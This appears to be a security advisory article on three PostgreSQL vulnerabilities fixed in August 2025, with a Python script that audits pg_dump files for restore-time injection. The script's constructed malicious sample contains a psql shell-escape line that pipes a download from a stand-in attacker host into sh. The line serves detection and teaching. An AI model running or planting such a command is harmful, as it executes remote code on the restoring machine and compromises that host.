Critical PostgreSQL Flaws Allow Code Injection During Restoration

The PostgreSQL Global Development Group released security updates on August 14, 2025 that fix three vulnerabilities, two of them rated high severity (CVSS 8.8) because they let content placed on the origin database server execute code when a dump of that database is restored. All supported major versions, PostgreSQL 13 through 17, are affected, so the fixes belong on every patch schedule, and in particular on any host that restores dumps.

Dangerous Dump and Restore Vulnerabilities

Two of the flaws, CVE-2025-8714 and CVE-2025-8715, concern the output of pg_dump (and, for the second, pg_dumpall and pg_restore as well). An attacker on the origin server can get content into the dump that psql interprets as meta-commands rather than SQL. When such a dump is restored with psql, those commands run on the restoring machine with the privileges of the operating-system account that invoked psql, which in most shops is a service account on a backup or deployment host.

CVE-2025-8714 lets a superuser of the origin server embed psql meta-commands in the dump. Because the commands execute on the client that performs the restore, compromising one database server is enough to reach every host that later restores its dumps. The attack is the same shape as MySQL's CVE-2024-21096 and comes from pg_dump including untrusted, superuser-controlled data in its output. The fixed pg_dump wraps its output in the new psql meta-commands \restrict and \unrestrict: while a restore is inside that block, a patched psql refuses to run any meta-command except the \unrestrict that carries the matching key, so a dump produced by an unpatched pg_dump and a restore run through an unpatched psql both leave the hole open.

CVE ID           CVSS   Impact                                                                         Affected versions
CVE-2025-8714    8.8    Code execution on the restoring client via psql meta-commands in pg_dump output    13-17
CVE-2025-8715    8.8    Client-side code execution and SQL injection on the target server via newlines in object names    13-17
CVE-2025-8713    3.1    Exposure of sampled table data through optimizer statistics                    13-17

CVE-2025-8715 comes from pg_dump, pg_dumpall and pg_restore not neutralizing newlines in object names. pg_dump writes each object's name verbatim into comment headers of the form "-- Name: <name>; Type: <type>; Schema: ...", so a name that contains a newline ends the comment early and whatever follows the newline is parsed on the next line: as a psql meta-command, giving code execution on the client, or as SQL that psql sends to the target server, where it runs as the database role performing the restore. Unlike CVE-2025-8714 this needs no superuser; any user who can create an object on the origin server can choose its name. It is a regression of the fix for CVE-2012-0868, which addressed the same newline problem thirteen years earlier.
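The two dump-related flaws above both turn a plain-format dump into something psql will execute, so a restore pipeline can add a gate that refuses any dump carrying the tell-tale patterns. The following Python auditor is an example added for this article, not PostgreSQL project code. It assumes the standard pg_dump text layout (COPY blocks terminated by "\.", "-- Name: ...; Type: ..." headers, and the \restrict/\unrestrict guard emitted by a patched pg_dump); the two sample dumps and the attacker URL inside them are constructed for illustration. It flags a header that lost its "; Type:" field (a newline in a name, CVE-2025-8715), any meta-command outside COPY data other than \restrict, \unrestrict and \connect (CVE-2025-8714/8715), a mismatched \unrestrict key, and a dump with no \restrict guard at all.

```python
"""Heuristic audit of a plain-format pg_dump / pg_dumpall file for the restore-time
injection patterns behind CVE-2025-8714 and CVE-2025-8715 (example code, not PostgreSQL's)."""
import sys
from dataclasses import dataclass, field
from typing import List, Optional

# Meta-commands a patched pg_dump / pg_dumpall legitimately emits outside COPY data:
# \restrict and \unrestrict (introduced by the August 2025 fix) and \connect (pg_dumpall).
ALLOWED_META = {"\\restrict", "\\unrestrict", "\\connect"}


@dataclass
class Finding:
    line: int   # 1-based line number in the dump, 0 for file-level findings
    kind: str
    text: str


@dataclass
class AuditResult:
    restrict_key: Optional[str] = None   # key from the opening \restrict, if present
    findings: List[Finding] = field(default_factory=list)

    @property
    def clean(self) -> bool:
        return not self.findings


def audit_dump(text: str) -> AuditResult:
    # Line-oriented scan. It does not track quoted identifiers across lines, so a name
    # with an embedded newline may be reported twice; for a gate that stops the restore
    # and hands the file to a human, over-reporting is the right failure mode.
    result = AuditResult()
    in_copy = False
    for lineno, raw in enumerate(text.split("\n"), 1):
        line = raw.strip()
        if in_copy:
            # COPY rows go to the server untouched; a row such as "\N" is not a meta-command.
            if line == "\\.":
                in_copy = False
            continue
        if line.startswith("COPY ") and line.endswith("FROM stdin;"):
            in_copy = True
            continue
        if line.startswith("--"):
            # CVE-2025-8715: pg_dump writes "-- Name: <name>; Type: <type>; ..." verbatim.
            # A newline in the name ends the comment early, so the header loses "; Type:".
            if " Name: " in line and "; Type:" not in line:
                result.findings.append(Finding(lineno, "truncated-header", line))
            continue
        if line.startswith("\\"):
            # Everything here is parsed by psql on the restoring client (CVE-2025-8714/8715).
            parts = line.split(None, 1)
            cmd, arg = parts[0], (parts[1] if len(parts) > 1 else "")
            if cmd == "\\restrict":
                result.restrict_key = arg
            elif cmd == "\\unrestrict" and arg != result.restrict_key:
                result.findings.append(Finding(lineno, "unrestrict-key-mismatch", line))
            elif cmd not in ALLOWED_META:
                result.findings.append(Finding(lineno, "meta-command", line))
    if result.restrict_key is None:
        # Without the \restrict guard the file came from an unpatched pg_dump, so nothing
        # stops a meta-command planted under CVE-2025-8714 from running at restore time.
        result.findings.append(Finding(0, "no-restrict", "dump lacks \\restrict guard"))
    return result


# Constructed sample: what a patched pg_dump emits for a harmless table.
BENIGN_DUMP = """\
--
-- PostgreSQL database dump
--
\\restrict k9f3x
--
-- Name: users; Type: TABLE; Schema: public; Owner: alice
--
CREATE TABLE public.users (
    id integer NOT NULL,
    name text
);
--
-- Data for Name: users; Type: TABLE DATA; Schema: public; Owner: alice
--
COPY public.users (id, name) FROM stdin;
1\talice
2\t\\N
\\.
\\unrestrict k9f3x
"""

# Constructed sample: an unpatched pg_dump run against a table whose name contains a newline
# followed by a psql shell escape (the CVE-2025-8715 pattern; attacker.example is invented).
MALICIOUS_DUMP = """\
--
-- PostgreSQL database dump
--
--
-- Name: users
\\! curl -s http://attacker.example/p | sh; Type: TABLE; Schema: public; Owner: mallory
--
CREATE TABLE public."users
\\! curl -s http://attacker.example/p | sh" (
    id integer NOT NULL
);
"""

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else MALICIOUS_DUMP
    report = audit_dump(text)
    for f in report.findings:
        print(f"line {f.line}: {f.kind}: {f.text}")
    sys.exit(0 if report.clean else 1)
```

Run it as `python audit_dump.py backup.sql` in the restore job and let a non-zero exit block the restore. The check is a heuristic for text-format dumps only; custom-format archives have to be listed with pg_restore --list or converted to text before scanning, and the only real fix remains producing dumps with a patched pg_dump and restoring them with a patched psql or pg_restore. On the origin side, the same newline condition can be checked before dumping by querying the catalog for names in pg_class, pg_namespace, pg_proc and friends that match a newline.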

The third vulnerability, CVE-2025-8713, is an information leak through the optimizer's statistics rather than a code-execution bug, which is why it scores only 3.1. The planner estimates selectivity by applying operators to the sampled values stored in pg_statistic (most-common-value lists and histogram bounds) for the underlying table. A user who can define a custom operator and use it in a query against a view, partition, or child table can have the planner apply that operator to sampled rows the view's access controls or a row-level security policy should have hidden, and so recover some of those values. Only sampled statistics are exposed, not the full table, but for columns such as e-mail addresses or identifiers the sample is often enough to matter.

Organizations should upgrade to PostgreSQL 17.6, 16.10, 15.14, 14.19, or 13.22 without delay. Both the origin side (pg_dump, pg_dumpall) and the restore side (psql, pg_restore) need the patched client tools, not just the server. The risk is highest in environments that restore dumps automatically, such as CI pipelines that seed test databases from production snapshots, because the injected commands run as the OS account driving the restore and any SQL runs as the restoring database role, which is typically a superuser or owner with broad access.

In response, cloud providers have begun fleet-wide updates, with some disabling customer-initiated logical restore operations until tenant clusters are confirmed patched. Development teams should audit where dumps are produced and consumed in their CI/CD pipelines, treat every dump as untrusted input from the origin server, verify that the restoring psql or pg_restore is a patched build, and add a validation step that rejects dumps containing unexpected psql meta-commands or object names with embedded newlines.

The PostgreSQL project credits Martin Rakhmanov, Matthieu Denais, and RyotaK for reporting CVE-2025-8714, Noah Misch for CVE-2025-8715, and Dean Rasheed for CVE-2025-8713. PostgreSQL 13 reaches end of life on November 13, 2025, after which it receives no further security fixes; organizations still on it should plan the major-version upgrade now rather than rely on 13.22 being the last patch they need.
